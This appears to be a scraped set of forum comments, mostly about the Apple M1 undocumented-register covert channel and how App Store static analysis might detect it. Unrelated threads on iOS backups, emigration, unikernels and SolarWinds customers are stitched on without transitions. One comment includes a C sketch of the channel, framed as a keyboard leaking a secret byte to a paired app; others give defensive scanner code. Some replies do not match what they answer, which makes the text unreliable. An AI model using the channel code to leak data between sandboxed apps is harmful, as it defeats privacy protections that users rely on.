While Marcan has written this up in a very entertaining fashion, there is perhaps one application of this vulnerability that wasn't considered.
If this can be reproduced on the iPhone, it can lead to third-party keyboards exfiltrating data. By default, keyboard app extensions are sandboxed away from their owning applications [0], but they could communicate with the app over this channel and leak data. It's not quite as easy as I describe, because the app would have to be alive and scheduled on the same cluster, but it's within the realm of possibility.
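For concreteness, here's a minimal sketch of what the covert channel itself looks like. This is illustrative only, not the PoC from the disclosure: it assumes the s3_5_c15_c10_1 register named there is readable and writable from user mode and that its two low bits are the state shared across all cores in a cluster.

    /* channel_sketch.c - illustrative sketch of the covert channel, not the
     * PoC from the disclosure. Assumes the undocumented register
     * s3_5_c15_c10_1 is readable/writable from user mode and that its two
     * low bits are the state shared by every core in a cluster. */
    #include <stdint.h>
    #include <stdio.h>

    static inline void channel_write(uint64_t bits)
    {
        uint64_t v;
        __asm__ volatile("mrs %0, s3_5_c15_c10_1" : "=r"(v));
        v = (v & ~3ULL) | (bits & 3ULL);   /* touch only the two shared bits */
        __asm__ volatile("msr s3_5_c15_c10_1, %0" :: "r"(v));
    }

    static inline uint64_t channel_read(void)
    {
        uint64_t v;
        __asm__ volatile("mrs %0, s3_5_c15_c10_1" : "=r"(v));
        return v & 3ULL;
    }

    int main(void)
    {
        /* "keyboard" side: shift a byte out two bits at a time; the paired
         * app polls channel_read() on another core of the same cluster */
        uint8_t secret = 0x5A;
        for (int i = 0; i < 8; i += 2)
            channel_write((secret >> i) & 3);
        printf("channel now holds: %llu\n", (unsigned long long)channel_read());
        return 0;
    }

A real channel would of course need some handshaking so sender and receiver stay in step, and the receiver has to be scheduled on the same cluster at the same time, which is the hard part mentioned above.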
> However, since iOS apps distributed through the App Store are not allowed to build code at runtime (JIT), Apple can automatically scan them at submission time and reliably detect any attempts to exploit this vulnerability using static analysis (which they already use). We do not have further information on whether Apple is planning to deploy these checks (or whether they have already done so), but they are aware of the potential issue and it would be reasonable to expect they will. It is even possible that the existing automated analysis already rejects any attempts to use system registers directly.
As I mentioned below and on the disclosure page, it's trivial for Apple to reliably detect this in apps submitted to the App Store and reject them, so I'm not worried. There's no such thing as "obfuscated" malware in the traditional sense on the App Store. You can obfuscate the code flow all you want, but all executable code has to be signed to run on iDevices. If you try to use this register, the instruction will be there for all to see. You can't use self-modifying code or packers on iOS.
I expect Apple to include checks for this in their App Store static analyzer, if they aren't already rejecting sysreg instructions, which mitigates the issue. Obviously JIT isn't allowed in the App Store, so this should be an effective strategy.
JITC is actually irrelevant here; this is not an argument for blocking it.
Firstly, no normal JITC will ever emit instructions that access undocumented system registers. Any JITC that comes from a known trusted source (and they're expensive to develop, so they basically all do) would be signed/whitelisted already and not be a threat anyway.
So what about new/unrecognised programs or dylibs that request JITC access? Well, Apple already maintains many categories of disallowed things in the App Store that can't be detected via static analysis. For example, they disallow changing the behaviour of the app after it is released via downloaded data files, which is both very vague and impossible to enforce statically. So this doesn't fundamentally change the nature of things.
But what if you insist on being able to catch exploitation of your own obscure CPU bugs via static analysis? Well, then XNU can just implement the following strategy:
1. If a dylib requests a JITC entitlement, and the Mach-O CD Hash is on a whitelist of "known legit" compilers, allow.
2. Otherwise, require pages to be W^X. So the JITC requests some writeable pages, fills them with code, and then requests the kernel to make the pages executable. At that point XNU suspends the process and scans the requested pages for illegal instruction sequences. The pages are hot in the cache anyway and the checks are simple, so it's no big deal. If the static checks pass, the page is flipped to be executable but not writeable and the app can proceed.
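To make step 2 concrete, here's a rough user-space sketch of that lifecycle. This is hypothetical: the scan shown is what the kernel would do at the RW-to-RX transition, and the mask/value pair is my own computation of the two problem instructions (msr/mrs s3_5_c15_c10_1), which differ only in the read/write bit and the general-purpose register field.

    /* wx_sketch.c - illustrative only. Mirrors, in user space, the flow
     * proposed above for XNU: fill RW pages with generated code, scan them,
     * and only then flip them to RX (never RWX). */
    #include <stdint.h>
    #include <stdio.h>
    #include <sys/mman.h>

    #define PAGE_SZ 16384   /* Apple Silicon uses 16K pages */

    static int page_is_clean(const uint32_t *code, size_t nwords)
    {
        for (size_t i = 0; i < nwords; i++)
            if ((code[i] & 0xFFDFFFE0u) == 0xD51DFA20u)
                return 0;   /* forbidden sysreg access found */
        return 1;
    }

    int main(void)
    {
        /* 1. the JIT asks for writable, non-executable pages */
        uint32_t *buf = mmap(NULL, PAGE_SZ, PROT_READ | PROT_WRITE,
                             MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        if (buf == MAP_FAILED)
            return 1;

        /* 2. it emits code; here just "ret" (0xD65F03C0) as a stand-in */
        for (size_t i = 0; i < PAGE_SZ / 4; i++)
            buf[i] = 0xD65F03C0u;

        /* 3. scan, then flip to read+execute; reject if anything matches */
        if (!page_is_clean(buf, PAGE_SZ / 4))
            return 1;
        if (mprotect(buf, PAGE_SZ, PROT_READ | PROT_EXEC) != 0)
            return 1;

        puts("pages promoted to RX after scan");
        return 0;
    }

On real Apple platforms the user-space side additionally involves MAP_JIT and pthread_jit_write_protect_np, but the point here is just the RW -> scan -> RX ordering.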
Apple's ban on JITC has never really made much technical sense to me. It feels like a way to save costs on static analysis investment and to try to force developers onto Apple's own languages and toolchains, with security used as a fig leaf. It doesn't make malware harder to write, but it definitely exposes Apple to possible legal hot water, as it means competitors can't build competitive first-party web browsers for the platform. The only thing that saves them is their own high prices and refusal to try to grab high enough market share.
The article may have been updated in the last couple of hours, but it now says:
*What about iOS?*
iOS is affected, like all other OSes. There are unique privacy implications to this vulnerability on iOS, as it could be used to bypass some of its stricter privacy protections. For example, keyboard apps are not allowed to access the internet, for privacy reasons. A malicious keyboard app could use this vulnerability to send text that the user types to another malicious app, which could then send it to the internet.
Only if detection requires solving the halting problem. It does not. You just look for certain instructions that normal code shouldn't use. JIT isn't allowed (which means all instructions the program uses can be checked statically), so it should be easy enough.
Marcan said elsewhere in the thread that the executable section on ARM also includes constant pools, so if I understand correctly, you can hide instructions in there and make it intractable for a static analyzer to determine whether they are really instructions or just data.
The real saving grace here is that iOS app binaries are submitted as LLVM IR instead of ARM machine code.
> you can hide instructions in there and make it intractable for a static analyzer to determine whether they are really instructions or just data.
Uh, no? This is very tractable - O(N) in the size of the binary - just check, for every single byte offset in executable memory, whether that offset, if jumped to or continued to from the previous instruction, would decode into a `msr s3_5_c15_c10_1, reg` or `mrs reg, s3_5_c15_c10_1` instruction.
IIUC, the decoding of an M1 ARM instruction doesn't depend on anything other than the bytes at the instruction pointer, so you only need one pass, and you only need to decode one instruction per offset, since the following instruction will occur at a later byte address.
Edit: unless its executable section isn't read-only, in which case static analyzers can't prove much of anything with any real confidence.
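For what it's worth, the pattern such a scan would look for is easy to derive from the register name. A sketch follows; the field layout is the generic ARMv8 MSR/MRS system-register encoding, and the resulting constants are my own computation, so treat them as illustrative:

    /* encode_sketch.c - derive the pattern such a scan looks for.
     * s3_5_c15_c10_1 means op0=3, op1=5, CRn=15, CRm=10, op2=1.
     * MSR/MRS (register) layout: 1101010100 | L | 1 | o0 | op1 | CRn | CRm |
     * op2 | Rt, with op0 = 2 + o0. Only L (bit 21) and Rt (bits 4:0) vary,
     * which is where the "26 fixed bits" mentioned further down come from. */
    #include <stdint.h>
    #include <stdio.h>

    static uint32_t sysreg_insn(unsigned L, unsigned op0, unsigned op1,
                                unsigned crn, unsigned crm, unsigned op2,
                                unsigned rt)
    {
        return (0x354u << 22) | (L << 21) | (1u << 20) | ((op0 - 2) << 19) |
               (op1 << 16) | (crn << 12) | (crm << 8) | (op2 << 5) | rt;
    }

    int main(void)
    {
        uint32_t msr_x15 = sysreg_insn(0, 3, 5, 15, 10, 1, 15);
        uint32_t mrs_x0  = sysreg_insn(1, 3, 5, 15, 10, 1, 0);
        printf("msr s3_5_c15_c10_1, x15 -> 0x%08X\n", msr_x15); /* 0xD51DFA2F */
        printf("mrs x0, s3_5_c15_c10_1 -> 0x%08X\n", mrs_x0);   /* 0xD53DFA20 */
        /* a scanner then checks (word & 0xFFDFFFE0) == 0xD51DFA20 at each
         * candidate offset in executable memory */
        return 0;
    }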
Yes, but if program constants are in executable memory, then you can end up with byte sequences that represent numeric values but also happen to decode into the problematic instructions.
For example, this benign line of code would trip a static analyzer looking for `msr s3_5_c15_c10_1, x15` in the way you described:
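(Illustrative only; the constant below is my own computation of that instruction's encoding, per the derivation above.)

    // An innocent-looking constant whose bit pattern equals the encoding of
    // msr s3_5_c15_c10_1, x15 (0xD51DFA2F). If the compiler emits it into a
    // literal pool inside the text section, a naive instruction scan will
    // flag this otherwise benign program.
    static const uint32_t magic_seed = 0xD51DFA2F;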
I said false positives are an issue in the context of a "dumb" real-time kernel-side scan. App Store submission is different. They can afford to have false positives and have a human look at them to see if they look suspicious.
There are 26 fixed bits in the problem instructions, which means a false positive rate of roughly one per 2^26 aligned 32-bit words, i.e. one in 256MiB of uniformly distributed constant data (the false positive rate is, of course, zero for executable code, which makes up the majority of the text section of a binary). Constant data is not uniformly distributed, so in practice I expect this to be a rather rare occurrence.
I just looked at some Mac binaries, and it seems movk and constant-section loads have largely superseded ARM32-style inline constant pools. I still see some data in the text section, but it mostly seems to be offset tables before functions (not sure exactly what it is; it might have to do with stack unwinding), none of which looks like it could ever match the instruction encoding for that register. So in practice I don't think any of this will be a problem. It seems this was changed in gcc in 2015 [0]; I assume LLVM does the same.
Bitcode is required only on watchOS (to support the watch's 32-bit to 64-bit transition); on all other platforms it's optional and often turned off, as it makes a variety of things harder, like generating dSYMs for crash reporting.
Oh. Then I don't see how this can be reliably mitigated, other than patching LLVM to avoid writing the `msr s3_5_c15_c10_1` byte sequence in constant pools and then rejecting any binary that contains the byte sequence in an executable section. That seems difficult to get done before someone is able to submit a PoC malicious keyboard to the store, potentially turning this "joke" bug into a real problem. What am I missing?
W^X, except for transmuting user code pages to data pages (reading its own code should be fine, since it was loaded from a user binary anyhow), or a supervisor-level JIT helper that checks and transmutes user data pages into user code pages (verifying that user-mode JITs aren't being naughty).
There are often two kinds of loadable data pages: initialized constants (RO) and initialized variables (RW), so some will need to be writable, because pesky globals never seem to die. Neither should ever be executable, or that will cross the streams and end the universe. I'm annoyed when constants or constant pools are loaded into RW data pages, because it doesn't make sense.
So, it's basically an honor system. You cannot detect JIT, because there aren't "certain instructions" that aren't allowed - it's just certain registers that programs shouldn't access (but access patterns can be changed in branching code to ensure Apple won't catch it in their sandboxes).
Besides, even if certain instructions are not allowed, a program can modify itself, and it's hard to detect whether a program modifies itself without executing it under specific conditions or running it in a hypervisor.
You're missing the point: JIT not being allowed means programs may not modify themselves. They're in read+execute-only memory and cannot allocate writable+executable memory.
iPhones use the A12/A13/A14 chips, and the vulnerability is not confirmed there. Also, the post mentions that if you have two malware apps on your device, they can communicate in many other ways, so I'm not sure what's new here.
iPhones have not used the A1 chip for quite a few years now. Besides, the M1 and the A12+ have significant microarchitectural similarities, to the point that the DTK used the A12Z.
Furthermore, the keyboard app extension and the keyboard app are installed as a single package whose components are not supposed to communicate, which is why I brought this up.
You can still pull the database from an iOS backup on your Mac, or from one created with `idevicebackup2`.
The file is named `1b6b187a1b60b9ae8b720c79e2c67f472bab09c0`, `275ee4a160b7a7d60825a46b0d3ff0dcdb2fbc9d`, or `7c7fba66680ef796b916b067077cc246adacf01d`.
On macOS, these executables can be signed with a detached signature. Surprisingly, an embedded code signature also works (though the signature is stored in an extended attribute on the filesystem).
Speaking from experience, that's not necessarily true. EU countries accept equivalent experience in lieu of academic qualifications.
Assuming you are offered a position that pays well and have around five years of experience, emigration is a breeze.
My experience might not be universal, since I work in a niche CS field, but getting a work permit (also alluded to by other commenters) was trivial, and that likely applies to everyone.
This seems to be quite similar to the other unikernel that was posted recently [1]. It would be useful to have an in-depth comparison of these (and other) unikernels, especially with regard to performance and compatibility.
I can see that HermiTux has the ability to select only the syscalls needed by the embedded program, and to transform syscalls to function calls, which seems quite interesting.
That's certainly part of the point (and probably one of the main performance benefits). However, even if this doesn't happen, a unikernel still gives the advantage that it's much more difficult to run undesired code and is likely to improve security.
> OSv was originally designed and implemented by Cloudius Systems (now ScyllaDB) however currently it is being maintained and enhanced by a small community of volunteers.
Yeah, that doesn't sound conclusive in either direction -- it's not clear whether they made this on the way to ScyllaDB. I took another look just in case and found a source [0]:
> After much research into the market and technology, in mid-2014 the team decided to pivot away from OSv (still a live project). Instead they decided to embrace the Cassandra architecture but rewrite it from scratch in native code with all of the know-how of years of kernel/hypervisor coding. This would become the Scylla database.
I’m not in favour of having public client lists, especially when you’re a critical software vendor, but this list is just terrifying. There are a lot of big names there, and I won’t be surprised to hear of more incidents in the coming days.
“More than 425 of the US Fortune 500
All ten of the top ten US telecommunications companies
All five branches of the US Military
The US Pentagon, State Department, NASA, NSA, Postal Service, NOAA, Department of Justice, and the Office of the President of the United States
All five of the top five US accounting firms”
What’s the opposite of security through obscurity?
Any Fortune 500 company that's been around for more than a decade probably has one of every enterprise software product running somewhere. When I worked at a big bank, any company we acquired, large or small, usually kept its software stack bottled up right where it was, and the client list on the vendor's website just got updated to the new company name.
I mean, that company list has "Smith Barney", which doesn't exist anymore.
SolarWinds’ comprehensive products and services are used by more than 300,000 customers worldwide, including military, Fortune 500 companies, government agencies, and education institutions. Our customer list includes:
- More than 425 of the US Fortune 500
- All ten of the top ten US telecommunications companies
- All five branches of the US Military
- The US Pentagon, State Department, NASA, NSA, Postal Service, NOAA, Department of Justice, and the Office of the President of the United States
- All five of the top five US accounting firms
- Hundreds of universities and colleges worldwide
Partial customer listing:
Acxiom
Ameritrade
AT&T
Bellsouth Telecommunications
Best Western Intl.
Blue Cross Blue Shield
Booz Allen Hamilton
Boston Consulting
Cable & Wireless
Cablecom Media AG
Cablevision
CBS
Charter Communications
Cisco
CitiFinancial
City of Nashville
City of Tampa
Clemson University
Comcast Cable
Credit Suisse
Dow Chemical
EMC Corporation
Ericsson
Ernst and Young
Faurecia
Federal Express
Federal Reserve Bank
Fibercloud
Fiserv
Ford Motor Company
Foundstone
Gartner
Gates Foundation
General Dynamics
Gillette Deutschland GmbH
GTE
H&R Block
Harvard University
Hertz Corporation
ING Direct
IntelSat
J.D. Byrider
Johns Hopkins University
Kennedy Space Center
Kodak
Korea Telecom
Leggett and Platt
Level 3 Communications
Liz Claiborne
Lockheed Martin
Lucent
MasterCard
McDonald’s Restaurants
Microsoft
National Park Service
NCR
NEC
Nestle
New York Power Authority
New York Times
Nielsen Media Research
Nortel
Perot Systems Japan
Phillips Petroleum
Pricewaterhouse Coopers
Procter & Gamble
Sabre
Saks
San Francisco Intl. Airport
Siemens
Smart City Networks
Smith Barney
Smithsonian Institute
Sparkasse Hagen
Sprint
St. John’s University
Staples
Subaru
Supervalu
Swisscom AG
Symantec
Telecom Italia
Telenor
Texaco
The CDC
The Economist
Time Warner Cable
U.S. Air Force
University of Alaska
University of Kansas
University of Oklahoma
US Dept. Of Defense
US Postal Service
US Secret Service
Visa USA
Volvo
Williams Communications
Yahoo
For those, at least, you don't have to install SolarWinds code on your server to use them. They're endpoints for syslog. As long as your logs don't contain secrets (they shouldn't), it's not great, but not terrible.
Well, I don't see a real practical reason for keeping it secret.
If you look at the operating model of threat actors, even with the current hack, they have their targets; no one is going to say "hey, they have SolarWinds, let's hack them". Threat actors have their budgets, limited time, and goals. They could also find this information by other OSINT means. Even if it is listed on that page, they still need to do their research.
Even if SolarWinds did not have a list on their page, they are so big that you can count them as an interesting target anyway. It is the same with Google and MSFT: you can safely assume that if you hack them, some of your targets will be using tools from those companies.
I mean, security by obscurity is fine, but I don't see what kind of value it would bring in this scenario.
> Well I don't see real practical reason for keeping it secret.
Generally, you have to get a company's permission to use its name or logo as an endorsement. That agreement has stipulations, such as being revoked if the association could bring disrepute or reputational harm to the endorser.
I'm sure none of the companies on that list want their investors calling the IR department to ask whether this event is a material issue for the company.
I'm not a security person, but my first thought is that you're not trying to avoid "hey they have solar winds let's hack them," but rather "Hey, I want to attack Large Co., and a quick Google search says they run software from these 14 companies, so compromising any of those might get me in."
General reminder that your funny 404 page becomes instantly unfunny the second your tech department both publicly and catastrophically shits the bed: https://i.imgur.com/kNbScVH.png
If you look at the range of offerings, it makes more sense and doesn't sound as scary (or no more scary than a list of Microsoft customers would, for example).
[0]: https://developer.apple.com/library/archive/documentation/Ge...